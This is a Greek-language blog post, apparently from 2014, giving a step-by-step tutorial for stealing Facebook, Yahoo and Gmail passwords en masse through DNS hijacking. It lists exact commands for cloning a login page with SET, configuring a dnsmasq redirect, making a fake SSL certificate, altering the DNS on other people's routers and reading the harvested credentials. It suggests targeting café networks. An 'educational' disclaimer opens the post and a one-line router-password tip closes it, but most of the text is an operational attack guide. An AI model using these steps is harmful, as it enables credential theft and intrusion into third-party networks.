ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Τετάρτη, 15 Οκτωβρίου 2014

Πως κλεβουμε μαζικα κωδικους Facebook,Yahoo,Gmail με την μεθοδο dns hijacking (Expert Phising)



Τι θα χρειαστειτε;

1.Κali Λinux
2.Απομακρυσμενη προσβαση σε καποιο router


Οταν λεμε Dns hijacking ειναι οταν αλλαζουμε στο router η στη συσκευη του θυματος με ενα δικο μας dns server
δλδ αν ο χρηστης ψαχνει για www.facebook.com που ειναι ενα domain name
ο dns του θα του πει οτι το www.facebook.com βρισκετε στην ip 31.13.86.145
ενω αν αλλαξουμε στο router του θυματος και βαλουμε τον δικο μας dns server τοτε μπορουμε να βαλουμε οτι το www.facebook.com ειναι στην ταδε ip η οποια αυτη η ip ειναι η σελιδα phising που εχουμε φτιαξει

τωρα για να ξεκινησουμε αυτη την επιθεση
πρεπει να φτιαξουμε τον dns server μας και να φτιαξουμε και την σελιδα phising

Πριν αρχισουμε γραφουμε σε ενα τερματικο ifconfig


βλεπουμε οτι η εσωτερικη μας ip ειναι 192.168.1.4 σε εσας μπορει να ειναι κατι αλλο πχ 192.168.1.χ

τωρα ανοιγουμε το browser μας και γραφουμε 192.168.1.1 η 192.168.2.1 η 192.168.1.254 ωστε να ενωθουμε με το router μας
πηγαινουμε και επιλεγουμε firewall dmz και βαζουμε την εσωτερικη μας ip ,επιλεγουμε enable

αριστερα σημειωνουμε την public ip (εξωτερικη ip)

κλεινουμε το browser

τωρα σε ενα τερματικο γραφουμε

setoolkit

 επιλεγουμε 1
 επιλεγουμε 2
 επιλεγουμε 3
 επιλεγουμε 2
 γραφουμε την εξωτερικη μας ip

γραφουμε την ψευτικη σελιδα που θελουμε να φτιαξουμε πχ https://www,facebook.com/

 και παταμε enter


παταμε ctrl+c ωστε να κλεισει το SET
γραφουμε σε ενα τερματικο nano dns.conf μεσα γραφουμε

address=/facebook.com/εξωτερικηip


 παταμε ctr+x επιλεγουμε enter και αποθηκευουμε

τωρα ειμαστε ετοιμοι να ξεκινησουμε τον dns server μας ομως πριν το κανουμε αυτο επειδη το facebook ειναι https και σε ορισμενα browsers δεν θα εμφανιζει καν την σελιδα οποτε αναγκαστικα πρεπει να δημιουργησουμε ενα ssl πιστοποιητικο για την σελιδα phising που εχουμε φτιαξει με το SET
Το ssl certificate ειναι ενα πιστοποιητικο το οποιο κρυπτογραφει και φροντιζει την ασφαλη μεταφορα δεδομενων απο την σελιδα προς εσας  και φροντιζει να ταυτοποιει και να πιστοποιει την σελιδα 

*Προαιρετικο* οποτε γραφουμε σε ενα τερματικο

a2enmod ssl

και για να φτιαξουμε το πιστοποιητικο γραφουμε στο τερματικο
 
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/private/facebook.key -out /etc/ssl/certs/facebook.pem

και βαζουμε τα εξεις στοιχεια ωστε να φενεται αληθινο *δειτε μετα στο τελος*


 τωρα γραφουμε nano /etc/apache2/sites-available/default-ssl

πηγαινουμε λιγο κατω που λεει ssl engine το αλλαζουμε σε on και προσθετουμε τις γραμμες αυτες


παταμε ctrl+x  μετα y και enter για να αποθηκευσουμε

*Τελος προαιρετικου*
μετα γραφουμε στο τερματικο

service apache2 restart


τωρα ειμαστε ετοιμοι να τρεξουμε τον dns server μας με την εντολη

dnsmasq --no-daemon --log-queries -C dns.conf

τωρα εφοσον τα εχουμε ολα μια χαρα μας μενει να βρουμε τα θυματα

 σε προηγουμενο μου οδηγο σας εδειξα πως ανιχνευετε και εισβαλετε σε αγνωστα router οποτε ας πουμε οτι εχετε προσβαση στο ρουτερ καποιου
 τοτε θα αλλαξετε το dns server του με την δικια σας εξωτερικη ip δλδ


τωρα εφοσον αλλαξαμε τον dns  server στο αγνωστο router θα δουμε στο τερματικο που τρεχει ο dns server μας ολα τα domain που αναζητα καποιος απο το συγκκριμενο router και συγκεκριμενα θα δουμε την ανακατευθυνση του facebook πχ ο χρηστης με ip 193.xx.xx.xx ψαχνει το www.facebook.com
και ο dns server μας απανταει οτι ειναι στην ip 178.xx.xx.xx δλδ στην εξωτερικη μου ip που εχω την σελιδα phising


και οταν ο χρηστης η οι χρηστες βαλουνε τον κωδικο τους τοτε εσεις θα τρεξετε σε ενα τερματικο

cat /var/www/harvester*.txt
η tail -f  /var/www/harvester*.txt *για να μην τρεχετε συνεχεια την εντολη cat*

και θα σας τους εμφανισει


Αυτη η μεθοδος εφαρμοζετε καλυτερα σε δημοσια δικτυα πχ καφετεριες
Προσοχη σε μερικα browsers βγαζει οτι το πιστοποιητικο δεν ειναι εγκυρο γιατι πολυ απλα για την ψευτικη σελιδα facebook παρεχουμε ενα αλλο πιστοποιητικο και οχι το γνησιο
για να παρακαμψουμε αυτο πρεπει να κανουμε εγκατασταση το πιστοποιητικο στο θυμα μας πραγμα το οποιο ειναι αδυνατο εκτος και αν εχουμε απομακρυσμενη προσβαση η φυσικη
Ετσι οπως ειναι ο οδηγος εχει αποτελεσματα περιπου 85% βεβαια παρατηρησα οτι ειναι καλυτερο να μην βαζετε sll engine on και να εχετε την ψευτικη ιστοσελιδα σας χωρις ssl


Πως θα προστατευτειτε;

Απλα μην αφηνετε τους εργοστασιακους κωδικους στο ρουτερ σας γιατι ακομα και ενας κακοβουλος χρηστης να μην εχει απομακρυσμενη συνδεση με το ρουτερ σας μπορει να εχει απο την τοπικη συνδεση συνηθως αυτο γινετε σε καποια καφετερια η ακομα να εχει καποιον μολυσμενο με ιο χρηστη που ειναι στο δικτυο σας και να συνδεθει μεσω αυτου (δειτε προηγουμενους οδηγους)

Δεν υπάρχουν σχόλια: